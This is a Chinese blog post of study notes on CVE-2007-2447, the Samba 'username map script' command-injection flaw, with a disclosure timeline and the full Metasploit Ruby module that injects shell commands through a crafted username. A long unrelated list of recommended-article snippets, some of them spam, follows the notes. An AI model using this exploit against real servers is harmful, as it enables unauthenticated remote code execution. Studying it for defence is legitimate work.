isinstance
isinstance

Metasploit usermap_script漏洞相关笔记

usermap_script:CVE-2007-2447

Samba用户名映射脚本命令执行

这个模块利用漏洞执行命令,在Samba版本3.0.20到3.0.25rc3当使用非默认用户名映射脚本配置选项。
通过指定一个用户名包含shell元字符,攻击者可以执行任意命令。
不需要身份验证来利用此漏洞,因为此选项用于在身份验证之前映射用户名!

模块的位置
exploit/multi/samba/usermap_script

用户输入未转义的参数作为参数传递到/bin/sh,允许远程命令执行

此错误最初是针对匿名呼叫报告的

到SamrChangePassword() MS-RPC函数组合与“用户名映射脚本”smb.conf选项(这不是
默认启用)。

经过Samba开发者的进一步调查,结果是确定了问题更广泛和影响远程打印机和文件共享管理。 根原因是传递通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中。
然而,不同于"username map script"漏洞,远程文件和打印机管理脚本需要经过身份验证的用户会话。

漏洞的时间线:

  • 2007年5月7日:漏洞匿名披露到[email protected]电子邮件列表中。
  • 2007年5月7日:Samba的开发人员Gerald Carter开始响应这个漏洞。
  • 2007年5月9日:Samba的开发者Jeremy Allison发布了补丁,用于iDefense测试。
  • 2007年5月10日:向vendor-sec邮件列表发布通知。
  • 2007年5月14日:公开漏洞信息。

下面我们来看看usermap_srcipt.rb这个exploitd 原理
这是源代码,用ruby写的

##
# $Id: usermap_script.rb 10040 2010-08-18 17:24:46Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

# 这个和Python的import还要C的include一样的作用
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
# Metasploit3是从Msf::Exploit::Remote中继承的

    Rank = ExcellentRanking

    include Msf::Exploit::Remote::SMB

    # For our customized version of session_setup_ntlmv1
    CONST = Rex::Proto::SMB::Constants
    CRYPT = Rex::Proto::SMB::Crypt

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Samba "username map script" Command Execution',
            'Description'    => %q{
                    This module exploits a command execution vulerability in Samba
                versions 3.0.20 through 3.0.25rc3 when using the non-default
                "username map script" configuration option. By specifying a username
                containing shell meta characters, attackers can execute arbitrary
                commands.

                No authentication is needed to exploit this vulnerability since
                this option is used to map usernames prior to authentication!
            },
            'Author'         => [ 'jduck' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 10040 $',
            'References'     =>
                [
                    [ 'CVE', '2007-2447' ],
                    [ 'OSVDB', '34700' ],
                    [ 'BID', '23972' ],
                    [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
                    [ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
                ],
            'Platform'       => ['unix'],
            'Arch'           => ARCH_CMD,
            'Privileged'     => true, # root or nobody user
            'Payload'        =>
                {
                    'Space'    => 1024,
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd',
                            # *_perl and *_ruby work if they are installed
                            # mileage may vary from system to system..
                        }
                },
            'Targets'        =>
                [
                    [ "Automatic", { } ]
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'May 14 2007'))

        register_options(
            [
                Opt::RPORT(139)
            ], self.class)
    end


    def exploit

        connect

        # lol?
        username = "/=`nohup " + payload.encoded + "`"
        begin
            simple.client.negotiate(false)
            simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
        rescue ::Timeout::Error, XCEPT::LoginError
            # nothing, it either worked or it didn't ;)
        end

        handler
    end

end

好吧ruby看不太懂哈哈,以后再来研究这段代码吧

你可能感兴趣的:(安全)

  • Linux利用多线程和线程同步实现一个简单的聊天服务器
    1.概述本文实现一个基于TCP/IP的简单多人聊天室程序。它包含一个服务器端和一个客户端:服务器能够接收多个客户端的连接,并将任何一个客户端发来的消息广播给所有其他连接的客户端;客户端则可以连接到服务器,发送消息并接收来自其他人的消息。该Demo运用了网络编程(SocketAPI)、多线程(Pthreads)以及线程同步(互斥锁)技术,以实现并发处理和数据共享安全。2.核心技术网络编程(Socke
  • ESG碳交易骗局揭秘!量化北恒私募实盘大赛周一丰郭沛源被骗历程!受骗不能出金! 易星辰分享普法
    量化北恒私募实盘大赛周一丰投票项目安全吗?量化北恒私募实盘大赛周一丰积分投票已经亏损被骗了怎么办?警惕!量化北恒私募实盘大赛周一丰十选五项目合法吗——杀猪盘骗局!被骗提不了款!提不了现!出不来金!不要上当!自古有句话讲得好“人善被欺、马善被骑”,现如今也是被骗子利用到了极致,人善就真该被欺骗吗?狡猾的骗子们就利用到了这点,利用同情心、爱心去进行诈骗,宣传公益捐款、爱心慈善打比赛来骗取资金!正常的投
  • Navicat 连接不上阿里云服务器中安装的宝塔面板中的Mysql服务器 一只程序熊 阿里云服务器云计算
    项目场景:就今天在做宝塔的时候遇到一个新问题,在之前的阿里云服务器中都没有发现过这个问题!特此记录解决方案:本地连接不上云服务器主要是这几个原因:1.云服务器官方的安全组问题(安全组是否放行目标端口)2.云服务器内部的服务端口问题(服务器内部端口是否向外部开放)但是今天我又在云服务器安全组内部发现了一个新的问题:3.云服务器中设置了仅本机访问的ipv6的地址,但是仍然访问不了。可能是因为navic
  • 计算机网络学习----Https协议 典孝赢麻崩乐急 计算机网络学习https
    在互联网通信中,数据安全始终是核心需求。当用户在浏览器中输入https://访问网站时,背后隐藏着一套复杂的安全机制——HTTPS(HypertextTransferProtocolSecure)。它通过TLS/SSL协议对HTTP通信加密,而支撑这一加密体系的核心正是证书体系。本文将详细解析HTTPS的证书体系、加密通信流程、核心作用、优缺点,并结合代码示例说明其实现逻辑。HTTPS是什么?HT
  • 2021-05-04 2021年5月9日考试顺利通过毕业 kellying
    不知什么时候,我每逢考试,我非常的紧张,考试之前根本无法入睡,精神也不再状态里,这是我一直来的毛病,在读小学,中学,中专,考试的时候,经常丢东西,丢三丢四,因此掉了很多的东西,经常抱怨自己,恨自己,结果我一点不自信,缺乏安全感,走进社会,混的不好。是自己记忆性不如别人,所以做任何事情不如别人,现在经过自己的努力终于找到一点自信了,希望我的今后的日子好过点,谢谢
  • 基于单片机智能消毒柜设计 小新单片机 单片机设计库单片机嵌入式硬件stm32消毒柜
    传送门其他作品题目速选一览表其他作品题目功能速览概述本设计实现了一种基于单片机的高效智能消毒柜系统,集精准灭菌、安全防护与能耗管理于一体。系统以微控制器(如STM32)为核心,集成多模式消毒模块、环境传感器及人机交互单元。所以想通过本次设计真正意义上去感受智能产品的魅力;更加深刻了解单片机以及嵌入式操作系的主要特点在于功能性强实用、操作简单、价格低并且还易于安装这些特点。一、系统核心组成模块功能说
  • 煤海放飞青春梦 尘飞扬兮
    青春像一首诗,任凭年青的心灵创作;青春像一碗心灵鸡汤,令失去它的人午夜梦回念念不忘;青春更像一个梦,让无数选煤儿女兢兢业业为之奋斗,为之耕耘!在美丽的准格尔煤田,一批批怀揣青春梦的青年们前仆后继破碎站——梦开始的地方驰骋煤海,他们在这里播种青春梦,收获了事业的成功更实现了人生的价值!阳光倾洒而下,轻柔曼妙,轻地仿佛怕惊动了沉睡的煤尘。嘎吱一声响,岗位室的门开了,一个头戴红色安全帽,系黑色帽带,穿橘
  • 基于单片机智能衣柜/智能衣橱设计 小新单片机 单片机设计库单片机嵌入式硬件51单片机stm32智能衣橱
    传送门其他作品题目速选一览表其他作品题目功能速览概述本设计实现了一种基于单片机的多功能智能衣柜,融合环境检测、安全防护与用户交互功能。系统以微控制器(如STM32/ESP32)为核心,集成传感器、执行机构及无线通信模块(Wi-Fi/蓝牙)。研究此项目可以让我们的生活变得更加便捷,所以想通过本次设计真正意义上去感受智能产品的魅力;更加深刻了解单片机以及嵌入式操作系的主要特点在于功能性强实用、操作简单
  • 记录快乐的读书时光 林姐_健康生活
    “魔法人生·悦读俱乐部”第21天打卡(《业力管理》第97页~第112页):生命终究是脆弱的,十几岁的少年骑电动车和三轮车发生车祸,人当场没了,可以想象到父母撕心裂肺的痛…到底是谁的错?孩子的胆大?父母的放纵?车主的粗心大意?揪谁的错没有意义,流逝的生命已无法挽回,安全警钟必须长鸣!一、今天阅读的有哪些重点内容,对我有哪些启发今天读了业力管理法则五:停止做决定1.“极简主义”设计,只有礼盒图片,没有
  • 典型骗局:以为进了炒股“社科院正式学堂朱民内部群”赚了大钱!结果进入St-balance节能煤水风电市场杀猪盘被骗45万 反诈进行时
    小心虚假St-balance节能煤水风电市场诈骗股股民!科院正式学堂朱民授课免费荐股有猫腻,不要投钱!随着互联网的普及,数字经济蓬勃发展,各种线上平台如雨后春笋般涌现。然而,在这些看似繁荣的平台中,不乏一些黑平台,它们以欺诈手段骗取用户的财产,给人们的财产安全带来严重威胁。因此,我们有必要提高警惕,防范黑平台诈骗St-balance节能煤水风电市场就是虚假平台,早期小故意让你提现,一旦大资金进入就
  • ELF文件解析 涌进的小羔羊 Android逆向androidc++ELF解析
    ELF文件解析近期正在进行Android的逆向。自己写出好代码是一个方面,而破解别人的代码则会给人另一种感受。因Java层的Android开发是如此不安全,越来越多的公司把重要的东西写入Native层,逻辑处理均由Native层完成,而Java层只负责进行结果显示。这样便要求对Native层的so文件进行逆向解析,而so文件是linux系统下的ELF(ExcutableandLinkableFil
  • FTP考点 之凹の鸥 笔记
    在网络工程师、运维工程师、系统管理员等岗位的面试中,FTP(FileTransferProtocol,文件传输协议)是基础但高频的考点,尤其在涉及文件共享、数据传输、服务器管理等场景中。以下是系统化的核心考点梳理,涵盖FTP基础概念、工作模式、安全特性及应聘高频问题。一、FTP基础考点1.FTP的核心概念(必会)(1)FTP的定义与作用定义:FTP是应用层协议,用于在客户端和服务器之间可靠地传输文
  • DNS考点
    在网络工程师、系统工程师、运维工程师、安全工程师等岗位的面试中,DNS(DomainNameSystem,域名系统)是高频必考知识点。DNS作为互联网的“电话簿”,负责将人类可读的域名(如www.example.com)解析为机器可识别的IP地址(如192.0.2.1),是网络通信的基础组件。以下是系统化的核心考点梳理,涵盖DNS基础概念、工作原理、协议细节及应聘高频问题。一、DNS基础考点1.D
  • 路由,代理服务器和NAT技术的区别
    常见的局域网接入Internet的技术有三种:直接路由代理服务器(proxy)网络地址转换(NAT)一、直接路由第一种方法比较简单直接,不过要求客户机都有真实IP,仅这一点,大多数的环境就无法满足–IP地址可是紧缺资源哦。而且一台硬件路由器的价格不斐,真实IP挂在网上安全上也让人不放心。所以这种方案应用得不多。二、代理服务器代理服务器(ProxyServer)是一种重要的服务器安全功能,它的工作主
  • 常见Hash算法 LUCIAZZZ 算法哈希算法javaspringboot操作系统spring密码学
    部分内容来源:JavaGuide什么是Hash算法哈希算法也叫散列函数或摘要算法,它的作用是对任意长度的数据生成一个固定长度的唯一标识也叫哈希值、散列值或消息摘要哈希算法的是不可逆的,你无法通过哈希之后的值再得到原值哈希值的作用是可以用来验证数据的完整性和一致性哈希算法可以简单分为两类:加密哈希算法:安全性较高的哈希算法,它可以提供一定的数据完整性保护和数据防篡改能力,能够抵御一定的攻击手段,安全
  • HTTP,HTTPS 之凹の鸥 httphttps网络协议
    在网络工程师、开发工程师、运维工程师等岗位的面试中,HTTP/HTTPS是高频必考知识点,尤其在前端、后端、测试、DevOps等与网络通信相关的职位中。以下是系统化的核心考点梳理,涵盖基础概念、协议机制、安全特性及应聘高频问题。一、HTTP基础1.HTTP的核心概念(1)HTTP的定义与作用定义:HTTP(HyperTextTransferProtocol,超文本传输协议)是应用层协议,用于在客户
  • 互联网赚钱有几种方法,网络正规安全的平台有哪些 优惠券高省
    我平时闲暇时间很多,一天内很多时间都花在网络上,很久之前就打算在网上找个兼职,但一直未找到合适的工作。我是2022年加入这个正规兼职平台的(小编真的是兼职,平时带孩子,业余时间做),有时候做做推广还可以赚个几十,百来块钱的,跟平台的一些人比起来,这只能算是中等水平了,但我已经很知足了,毕竟是兼职不是吗?平台做得比我好的人有很多。也就是说,不熟练的,懒散点的,一个月一千出头,中等的一两千,做得好点的
  • 乐惠国际怎么去学习操作技巧?该怎么分辨是否安全? 御老师
    微交易市场形式千变万化,稍有不慎就会导致亏损,为了把握盈利机会,最大限度降低风险,对基本面进行分析是必做功课。微交易中的基本面,指的是各种重大新闻、财政热点,这些动态资讯与市场行情走势息息相关,需要重点关注。那么,分析消息面时要注意哪些事项?搜索【庞老师微信:wtz677】一起学习盈利技巧一、注意资讯的时效性时效性是新闻的生命,直接关系到新闻信息的价值。在互联网时代,投资人可以突破地域限制,快速获
  • 恋爱八年,我逃婚了(江苒顾现许曼)免费小说全集_阅读免费小说恋爱八年,我逃婚了江苒顾现许曼 喵喵美文
    《恋爱八年,我逃婚了》主角:江苒顾现许曼简介:我和顾现恋爱八年。在婚期前三天,却发现他电脑里存了上万张同一个女生的照片。我偷偷订下婚礼当天出国的机票。静静看着他若无其事地表演。婚礼当天新娘逃婚,他却疯了。路上顾现的手机几次震动,都是许曼发来消息问他有没有安全到家。我解锁了屏幕,本来想礼貌性地回一句。却看见他和朋友的聊天记录。【假结婚是我最后的机会,如果她还是不回来,我就真的要放弃了。】【你在班级群
  • M3088NL是一款网络滤波器/变压器支持100M和1000M网络环境,适用于高速网络传输场景M3088 Shang13113048791 网络边缘计算图像处理信号处理
    M3088NL是一款网络滤波器/变压器,主要特点如下:兼容性支持100M和1000M网络环境,适用于高速网络传输场景。‌封装形式采用SOP/SOIC封装,便于电路集成。‌应用场景常用于网络电话、开关电源等需要稳定电流的设备,符合IEEE802.3af标准。‌性能参数‌•电流能力‌:350mA•‌传输方式‌:需1:1的传输和收发器配合使用‌•‌安全标准‌:符合ROHS环保标准•标准‌:符合IEEE8
  • 《自动驾驶汽车致损的民事侵权责任》(三) 刘东利2020
    由此,回到道路交通责任的框架下:由于绝大多数交通事故都源于驾驶员的某种程度上的过错,因而驾驶过失是驾驶员承担机动车道路交通事故损害赔偿责任的责任基础。虽然从原则上看这是成立的,但是却没有照顾到以下两个方面对于该原则的突破。这是在人类驾驶汽车,也就是L0-L2阶段仍然试用的原则。具体到事故场景,又分为:一是,关于机动车驾驶员的责任原则,立法例中存在从过错责任到无过错责任的各种变化。我国《道路交通安全
  • 安全居住判断五个要点。 独孤派
    【找房子前考虑居住环境是否安全~】五点因素判断一个居住环境是否安全,需考虑这五点因素很多人在外打拼就面临租房的问题,租房要考虑的最重要的一点就是安全。要获得一个安全的居住环境,从选房开始就要仔细把关。判断一个居住环境是否安全,就要考虑到这五点因素。一、当地新闻输入该小区路段名、小区、片区名等,看看是否有发生过违法犯罪的新闻,甚至交通事故新闻也要留意,因为有的路段晚上通行的大货车、运渣车较多,或路灯
  • 2023-03-21 硬拉天花板 我是小胡胡123
    在感叹人类对生命敬畏的同时,作为普通人我们需要安全健身。硬拉名人榜,你的硬拉多重,就来对号入座:硬拉35kg,刚来健身房拍照发朋友圈的软妹子硬拉50kg,糖果超甜、吃个桃桃、小鲜肉硬拉70-80kg,中国男性平均水平硬拉90kg,我要努力健身,我要成为一个猛男,要猛!硬拉100kg,我会和同事、同学、朋友说我是一个健身爱好者,我不吃蛋白粉。最近很火的PT华哥挑战是单手徒手硬拉100kg哑铃,这个对
  • 安全重于泰山 任娟
    为了促进我校班主任团队的专业成长,切实提高班主任管理工作的艺术水平,保障学生在校安全。6月11日下午6:20,我校德育处组织小学部全体班主任在阶梯教室召开会议。这次会议的主题是“班主任工作如何做”。各年级根据学段特点确定研讨主题:一年级研讨内容:学生课间玩耍安全。二年级研讨内容:学生离,返校安全。三年级研讨内容:学生发生安全事故应急处理方法。四年级研讨内容:学生就餐安全。五年级研讨内容:学生楼道玩
  • 一瞬间的无语 深海的老海绵
    就是刚刚的事有一个认识7,8年的游戏好友上大学的时候经常在一起玩游戏,毕业之后,偶尔也一起玩游戏。从来没有见过面,但是挺投缘的。接下来开始说明情况突然给我发微信说男朋友要把我删掉这就是瞬间的无语我又没有见过你,而且我也不想跟你发生什么,纯粹的就是游戏好友,没事时候聊聊天。为什么会突然给我发这个呢?搞不懂,而且发完之后就把我删了。是为了给男朋友安全感嘛可这太无语了吧我就是感觉可惜一个人是7,8年,虽
  • 银联商务的POS机价格贵吗?哪种POS机适合个人使用(拉卡拉和乐刷哪个更安全呢)市场供需情况 小易的生活
    银联商务的POS机价格是否贵,这个问题并没有一个绝对的答案,因为它受到多种因素的影响,包括POS机的型号、功能、市场供需情况、促销活动以及购买渠道等。价格范围根据市场情况,银联商务的POS机价格范围可以从几千元到上万元不等。具体来说,传统POS机的价格可能在1000元到3000元/台之间,而MPOS机(移动POS机)的价格则可能在2000元到5000元/台之间。但请注意,这些价格只是参考范围,实际
  • 基于 Python 的网站信息探测工具设计与实现 计算机毕业设计指导 python网络服务器
    基于Python的网站信息探测工具设计与实现摘要在渗透测试与网络安全评估中,信息探测是最基础且关键的一步。通过对目标网站的操作系统、服务器、CMS、端口、目录结构等信息进行自动化探测,可为后续攻击路径识别提供基础数据支撑。传统工具如WhatWeb、FOFA等虽功能强大,但在定制化与扩展性方面受限。本文设计并实现了一款基于Python的轻量级网站信息探测工具,支持URL/IP扫描、开放端口探测、CM
  • Python FastMCP:让你的AI工具链飞起来
    PythonFastMCP:让你的AI工具链飞起来FastMCPFastMCP是什么?1.工具(Tools):赋予LLM执行能力2.Resources(资源):安全数据通道3.Prompts(提示模板):标准化LLM交互4.组件协同:构建项目AI工具链5.部署架构与性能优化博主热门文章推荐:官方文档:FastMCP官方文档:https://gofastmcp.com/MCP协议规范:https:/
  • 【C++】深入理解C++迭代器:概念、分类与自定义实现
    文章目录前言1.迭代器的概念2.迭代器的作用3.迭代器的分类3.1按功能分类3.2按能否修改数据分类4.迭代器的本质迭代器的内部实现5.如何为自定义容器编写迭代器5.1定义迭代器5.2使用自定义迭代器前言1.迭代器的概念在C++中,迭代器(iterator)可以看作是一种指向容器元素的对象,它提供了类似指针的接口来访问容器中的元素。通过迭代器,程序员能够在不关心容器内部实现的情况下,安全地遍历容器
  • 车辆云端威胁情报共享系统的多维解析与发展路径 百态老人 大数据人工智能
    第一部分:内容本质提取原始内容描述了一个闭环网络安全体系:“车辆实时上传异常行为日志至安全运营中心(VSOC),云端通过机器学习分析攻击模式并下发全局防御策略”。其核心架构包含:数据采集层:车辆端持续收集异常行为日志数据,包含CAN总线通信模式、网络流量特征及驾驶行为数据传输层:通过V2X通信协议和OTA更新通道实现车云双向通信分析层:安全运营中心(VSOC)采用CNN-BiSRU等深度学习模型进
  • java线程的无限循环和退出 3213213333332132 java
    最近想写一个游戏,然后碰到有关线程的问题,网上查了好多资料都没满足。 突然想起了前段时间看的有关线程的视频,于是信手拈来写了一个线程的代码片段。 希望帮助刚学java线程的童鞋 package thread; import java.text.SimpleDateFormat; import java.util.Calendar; import java.util.Date
  • tomcat 容器 BlueSkator tomcatWebservlet
    Tomcat的组成部分 1、server A Server element represents the entire Catalina servlet container. (Singleton) 2、service service包括多个connector以及一个engine,其职责为处理由connector获得的客户请求。   3、connector 一个connector
  • php递归,静态变量,匿名函数使用 dcj3sjt126com PHP递归函数匿名函数静态变量引用传参
      <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <title>Current To-Do List</title> </head> <body>
  • 属性颜色字体变化 周华华 JavaScript
    function changSize(className){ var diva=byId("fot") diva.className=className; } </script> <style type="text/css"> .max{ background: #900; color:#039;
  • 将properties内容放置到map中 g21121 properties
    代码比较简单: private static Map<Object, Object> map; private static Properties p; static { //读取properties文件 InputStream is = XXX.class.getClassLoader().getResourceAsStream("xxx.properti
  • [简单]拼接字符串 53873039oycg 字符串
             工作中遇到需要从Map里面取值拼接字符串的情况,自己写了个,不是很好,欢迎提出更优雅的写法,代码如下:           import java.util.HashMap; import java.uti
  • Struts2学习 云端月影
    最近开始关注struts2的新特性,从这个版本开始,Struts开始使用convention-plugin代替codebehind-plugin来实现struts的零配置。 配置文件精简了,的确是简便了开发过程,但是,我们熟悉的配置突然disappear了,真是一下很不适应。跟着潮流走吧,看看该怎样来搞定convention-plugin。 使用Convention插件,你需要将其JAR文件放
  • Java新手入门的30个基本概念二 aijuans java新手java 入门
    基本概念:  1.OOP中唯一关系的是对象的接口是什么,就像计算机的销售商她不管电源内部结构是怎样的,他只关系能否给你提供电就行了,也就是只要知道can or not而不是how and why.所有的程序是由一定的属性和行为对象组成的,不同的对象的访问通过函数调用来完成,对象间所有的交流都是通过方法调用,通过对封装对象数据,很大限度上提高复用率。  2.OOP中最重要的思想是类,类是模板是蓝图,
  • jedis 简单使用 antlove javarediscachecommandjedis
    jedis.RedisOperationCollection.java package jedis; import org.apache.log4j.Logger; import redis.clients.jedis.Jedis; import java.util.List; import java.util.Map; import java.util.Set; pub
  • PL/SQL的函数和包体的基础 百合不是茶 PL/SQL编程函数包体显示包的具体数据
    由于明天举要上课,所以刚刚将代码敲了一遍PL/SQL的函数和包体的实现(单例模式过几天好好的总结下再发出来);以便明天能更好的学习PL/SQL的循环,今天太累了,所以早点睡觉,明天继续PL/SQL总有一天我会将你永远的记载在心里,,,   函数; 函数:PL/SQL中的函数相当于java中的方法;函数有返回值 定义函数的 --输入姓名找到该姓名的年薪 create or re
  • Mockito(二)--实例篇 bijian1013 持续集成mockito单元测试
            学习了基本知识后,就可以实战了,Mockito的实际使用还是比较麻烦的。因为在实际使用中,最常遇到的就是需要模拟第三方类库的行为。         比如现在有一个类FTPFileTransfer,实现了向FTP传输文件的功能。这个类中使用了a
  • 精通Oracle10编程SQL(7)编写控制结构 bijian1013 oracle数据库plsql
    /* *编写控制结构 */ --条件分支语句 --简单条件判断 DECLARE v_sal NUMBER(6,2); BEGIN select sal into v_sal from emp where lower(ename)=lower('&name'); if v_sal<2000 then update emp set
  • 【Log4j二】Log4j属性文件配置详解 bit1129 log4j
    如下是一个log4j.properties的配置   log4j.rootCategory=INFO, stdout , R log4j.appender.stdout=org.apache.log4j.ConsoleAppender log4j.appender.stdout.layout=org.apache.log4j.PatternLayout log4j.appe
  • java集合排序笔记 白糖_ java
    public class CollectionDemo implements Serializable,Comparable<CollectionDemo>{ private static final long serialVersionUID = -2958090810811192128L; private int id; private String nam
  • java导致linux负载过高的定位方法 ronin47
    定位java进程ID 可以使用top或ps -ef |grep java ![图片描述][1] 根据进程ID找到最消耗资源的java pid 比如第一步找到的进程ID为5431 执行 top -p 5431 -H ![图片描述][2] 打印java栈信息 $ jstack -l 5431 > 5431.log 在栈信息中定位具体问题 将消耗资源的Java PID转
  • 给定能随机生成整数1到5的函数,写出能随机生成整数1到7的函数 bylijinnan 函数
    import java.util.ArrayList; import java.util.List; import java.util.Random; public class RandNFromRand5 { /** 题目:给定能随机生成整数1到5的函数,写出能随机生成整数1到7的函数。 解法1: f(k) = (x0-1)*5^0+(x1-
  • PL/SQL Developer保存布局 Kai_Ge
          近日由于项目需要,数据库从DB2迁移到ORCAL,因此数据库连接客户端选择了PL/SQL Developer。由于软件运用不熟悉,造成了很多麻烦,最主要的就是进入后,左边列表有很多选项,自己删除了一些选项卡,布局很满意了,下次进入后又恢复了以前的布局,很是苦恼。在众多PL/SQL Developer使用技巧中找到如下这段:   &n
  • [未来战士计划]超能查派[剧透,慎入] comsci 计划
           非常好看,超能查派,这部电影......为我们这些热爱人工智能的工程技术人员提供一些参考意见和思想........        虽然电影里面的人物形象不是非常的可爱....但是非常的贴近现实生活....    &nbs
  • Google Map API V2 dai_lm google map
    以后如果要开发包含google map的程序就更麻烦咯 http://www.cnblogs.com/mengdd/archive/2013/01/01/2841390.html 找到篇不错的文章,大家可以参考一下 http://blog.sina.com.cn/s/blog_c2839d410101jahv.html 1. 创建Android工程 由于v2的key需要G
  • java数据计算层的几种解决方法2 datamachine javasql集算器
    2、SQL     SQL/SP/JDBC在这里属于一类,这是老牌的数据计算层,性能和灵活性是它的优势。但随着新情况的不断出现,单纯用SQL已经难以满足需求,比如: JAVA开发规模的扩大,数据量的剧增,复杂计算问题的涌现。虽然SQL得高分的指标不多,但都是权重最高的。     成熟度:5星。最成熟的。   
  • Linux下Telnet的安装与运行 dcj3sjt126com linuxtelnet
    Linux下Telnet的安装与运行   linux默认是使用SSH服务的 而不安装telnet服务  如果要使用telnet 就必须先安装相应的软件包  即使安装了软件包 默认的设置telnet 服务也是不运行的 需要手工进行设置 如果是redhat9,则在第三张光盘中找到 telnet-server-0.17-25.i386.rpm
  • PHP中钩子函数的实现与认识 dcj3sjt126com PHP
    假如有这么一段程序: function fun(){ fun1(); fun2(); }   首先程序执行完fun1()之后执行fun2()然后fun()结束。   但是,假如我们想对函数做一些变化。比如说,fun是一个解析函数,我们希望后期可以提供丰富的解析函数,而究竟用哪个函数解析,我们希望在配置文件中配置。这个时候就可以发挥钩子的力量了。   我们可以在fu
  • EOS中的WorkSpace密码修改 蕃薯耀 修改WorkSpace密码
    EOS中BPS的WorkSpace密码修改 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 201
  • SpringMVC4零配置--SpringSecurity相关配置【SpringSecurityConfig】 hanqunfeng SpringSecurity
     SpringSecurity的配置相对来说有些复杂,如果是完整的bean配置,则需要配置大量的bean,所以xml配置时使用了命名空间来简化配置,同样,spring为我们提供了一个抽象类WebSecurityConfigurerAdapter和一个注解@EnableWebMvcSecurity,达到同样减少bean配置的目的,如下:   applicationContex
  • ie 9 kendo ui中ajax跨域的问题 jackyrong AJAX跨域
    这两天遇到个问题,kendo ui的datagrid,根据json去读取数据,然后前端通过kendo ui的datagrid去渲染,但很奇怪的是,在ie 10,ie 11,chrome,firefox等浏览器中,同样的程序, 浏览起来是没问题的,但把应用放到公网上的一台服务器, 却发现如下情况: 1) ie 9下,不能出现任何数据,但用IE 9浏览器浏览本机的应用,却没任何问题
  • 不要让别人笑你不能成为程序员 lampcy 编程程序员
    在经历六个月的编程集训之后,我刚刚完成了我的第一次一对一的编码评估。但是事情并没有如我所想的那般顺利。 说实话,我感觉我的脑细胞像被轰炸过一样。 手慢慢地离开键盘,心里很压抑。不禁默默祈祷:一切都会进展顺利的,对吧?至少有些地方我的回答应该是没有遗漏的,是不是? 难道我选择编程真的是一个巨大的错误吗——我真的永远也成不了程序员吗? 我需要一点点安慰。在自我怀疑,不安全感和脆弱等等像龙卷风一
  • 马皇后的贤德 nannan408
       马皇后不怕朱元璋的坏脾气,并敢理直气壮地吹耳边风。众所周知,朱元璋不喜欢女人干政,他认为“后妃虽母仪天下,然不可使干政事”,因为“宠之太过,则骄恣犯分,上下失序”,因此还特地命人纂述《女诫》,以示警诫。但马皇后是个例外。   有一次,马皇后问朱元璋道:“如今天下老百姓安居乐业了吗?”朱元璋不高兴地回答:“这不是你应该问的。”马皇后振振有词地回敬道:“陛下是天下之父,
  • 选择某个属性值最大的那条记录(不仅仅包含指定属性,而是想要什么属性都可以) Rainbow702 sqlgroup by最大值max最大的那条记录
    好久好久不写SQL了,技能退化严重啊!!!   直入主题: 比如我有一张表,file_info, 它有两个属性(但实际不只,我这里只是作说明用): file_code, file_version 同一个code可能对应多个version 现在,我想针对每一个code,取得它相关的记录中,version 值 最大的那条记录, SQL如下: select *
  • VBScript脚本语言 tntxia VBScript
      VBScript 是基于VB的脚本语言。主要用于Asp和Excel的编程。   VB家族语言简介   Visual Basic 6.0           源于BASIC语言。           由微软公司开发的包含协助开发环境的事
  • java中枚举类型的使用 xiao1zhao2 javaenum枚举1.5新特性
    枚举类型是j2se在1.5引入的新的类型,通过关键字enum来定义,常用来存储一些常量.   1.定义一个简单的枚举类型 public enum Sex { MAN, WOMAN }   枚举类型本质是类,编译此段代码会生成.class文件.通过Sex.MAN来访问Sex中的成员,其返回值是Sex类型.   2.常用方法 静态的values()方
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他